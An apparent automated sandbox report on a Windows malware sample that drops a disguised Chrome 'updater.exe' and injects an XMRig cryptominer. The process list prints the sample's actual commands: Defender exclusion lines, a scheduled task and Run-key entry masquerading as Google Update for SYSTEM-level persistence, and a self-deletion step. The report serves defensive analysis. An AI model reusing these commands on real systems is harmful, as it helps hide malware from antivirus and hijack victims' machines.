Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
1513s -
max time network
1799s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231129-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231129-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1308 created 1180 1308 6vHkJ4UErTSS5ECD.exe 17 PID 1308 created 1180 1308 6vHkJ4UErTSS5ECD.exe 17 PID 1308 created 1180 1308 6vHkJ4UErTSS5ECD.exe 17 PID 1308 created 1180 1308 6vHkJ4UErTSS5ECD.exe 17 PID 696 created 1180 696 updater.exe 17 PID 696 created 1180 696 updater.exe 17 PID 696 created 1180 696 updater.exe 17 PID 696 created 1180 696 updater.exe 17 PID 2816 created 1180 2816 conhost.exe 17 PID 696 created 1180 696 updater.exe 17 -
XMRig Miner payload 30 IoCs
resource yara_rule behavioral5/memory/2980-71-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-73-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-75-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-79-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2980-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2528 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 696 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 268 taskeng.exe -
resource yara_rule behavioral5/memory/2980-65-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-71-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-73-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-75-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-79-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2980-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 696 set thread context of 2816 696 updater.exe 54 PID 696 set thread context of 2980 696 updater.exe 55 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 6vHkJ4UErTSS5ECD.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2748 schtasks.exe 756 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2564 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 106f7a06ec50da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1308 6vHkJ4UErTSS5ECD.exe 1308 6vHkJ4UErTSS5ECD.exe 2432 powershell.exe 1308 6vHkJ4UErTSS5ECD.exe 1308 6vHkJ4UErTSS5ECD.exe 2656 powershell.exe 1308 6vHkJ4UErTSS5ECD.exe 1308 6vHkJ4UErTSS5ECD.exe 1308 6vHkJ4UErTSS5ECD.exe 1308 6vHkJ4UErTSS5ECD.exe 2796 powershell.exe 696 updater.exe 696 updater.exe 2132 powershell.exe 696 updater.exe 696 updater.exe 1756 powershell.exe 696 updater.exe 696 updater.exe 696 updater.exe 696 updater.exe 2816 conhost.exe 2816 conhost.exe 696 updater.exe 696 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 696 updater.exe Token: SeAssignPrimaryTokenPrivilege 2564 WMIC.exe Token: SeIncreaseQuotaPrivilege 2564 WMIC.exe Token: SeSecurityPrivilege 2564 WMIC.exe Token: SeTakeOwnershipPrivilege 2564 WMIC.exe Token: SeLoadDriverPrivilege 2564 WMIC.exe Token: SeSystemtimePrivilege 2564 WMIC.exe Token: SeBackupPrivilege 2564 WMIC.exe Token: SeRestorePrivilege 2564 WMIC.exe Token: SeShutdownPrivilege 2564 WMIC.exe Token: SeSystemEnvironmentPrivilege 2564 WMIC.exe Token: SeUndockPrivilege 2564 WMIC.exe Token: SeManageVolumePrivilege 2564 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2564 WMIC.exe Token: SeIncreaseQuotaPrivilege 2564 WMIC.exe Token: SeSecurityPrivilege 2564 WMIC.exe Token: SeTakeOwnershipPrivilege 2564 WMIC.exe Token: SeLoadDriverPrivilege 2564 WMIC.exe Token: SeSystemtimePrivilege 2564 WMIC.exe Token: SeBackupPrivilege 2564 WMIC.exe Token: SeRestorePrivilege 2564 WMIC.exe Token: SeShutdownPrivilege 2564 WMIC.exe Token: SeSystemEnvironmentPrivilege 2564 WMIC.exe Token: SeUndockPrivilege 2564 WMIC.exe Token: SeManageVolumePrivilege 2564 WMIC.exe Token: SeLockMemoryPrivilege 2980 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2656 wrote to memory of 2748 2656 powershell.exe 32 PID 2656 wrote to memory of 2748 2656 powershell.exe 32 PID 2656 wrote to memory of 2748 2656 powershell.exe 32 PID 2528 wrote to memory of 2596 2528 cmd.exe 35 PID 2528 wrote to memory of 2596 2528 cmd.exe 35 PID 2528 wrote to memory of 2596 2528 cmd.exe 35 PID 2796 wrote to memory of 1852 2796 powershell.exe 38 PID 2796 wrote to memory of 1852 2796 powershell.exe 38 PID 2796 wrote to memory of 1852 2796 powershell.exe 38 PID 268 wrote to memory of 696 268 taskeng.exe 40 PID 268 wrote to memory of 696 268 taskeng.exe 40 PID 268 wrote to memory of 696 268 taskeng.exe 40 PID 1756 wrote to memory of 756 1756 powershell.exe 47 PID 1756 wrote to memory of 756 1756 powershell.exe 47 PID 1756 wrote to memory of 756 1756 powershell.exe 47 PID 696 wrote to memory of 2816 696 updater.exe 54 PID 2480 wrote to memory of 2564 2480 cmd.exe 48 PID 2480 wrote to memory of 2564 2480 cmd.exe 48 PID 2480 wrote to memory of 2564 2480 cmd.exe 48 PID 696 wrote to memory of 2980 696 updater.exe 55 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2748
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1852
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:756
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1196
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2480
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2596
-
C:\Windows\system32\taskeng.exetaskeng.exe {997349A8-9FF8-44FE-BE12-5B4B87F65D5E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:696
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2564
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
394KB
MD56845f404003888f5edf5c1763ee143fc
SHA1e43b2254a3d4adf6c97e3e65cc89ef4d8c3906b3
SHA256285cce087d908a5b13f3911f539c2580627e57f9897bffa08005b2757610125a
SHA512a1eacb6fbe7e0ceae7b771fbf885f9b4ca223c49f9f782c27c9620005c6c6dae11a4538ac2ecee26fde117abe6eae85129787d1aaf32f435927ffb4589c14aab
-
Filesize
93KB
MD51cbc3e7f7b5f7c05f70af7b63d2b967f
SHA1ae78d922435a9a9bdb7f2358a8f5446719ab5657
SHA256a24f4dd59d7ed2870ec7ea2b50f5d4dc89c5035bf568dfb3df5ccc81a6364c2f
SHA512b04f122af3ff9fb2c83f2372e07691989061c11785d56d6e5aba28e8658eba06d40a536eb5e2821a152b2139df4300b074503caa9f7a77b92158d0f64a9cd301
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5806d11e832b0a299692890f42be58f22
SHA17389c1a1436b9d614812298d334db204692d3649
SHA256a7dd1a35e26c80a0a8ff5b682bd874e93fcee59722fc51f513910c071310b392
SHA51265f2dcacefa12950d667cdb6994e09a116682f0ea8f741b56516186b2a830c5ed79b88cf2caff531c811866d9e1c627bcad709b24b09bdc72b729c18f1b9349b
-
Filesize
449KB
MD52ae2f8fa57a5ae8c0b470ee79e23833f
SHA19353adda931bd1c6e9a18f96638dc0be575abfa2
SHA256e6fd90ace4c06d00afb7e71232f2755f0dde00e6f8e681ee6d5a7130e9ded1d9
SHA51201ae498afd2aa45fb4f0a16793c82099ef183936798e0046951aec99f35f03133333548b0b8042dee6350c29a438b1930cbc98c03692e6d2663d1726b5fb4aed